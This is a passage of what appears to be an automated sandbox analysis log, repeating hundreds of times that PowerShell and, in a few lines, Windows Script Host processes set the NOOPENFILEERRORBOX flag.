                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
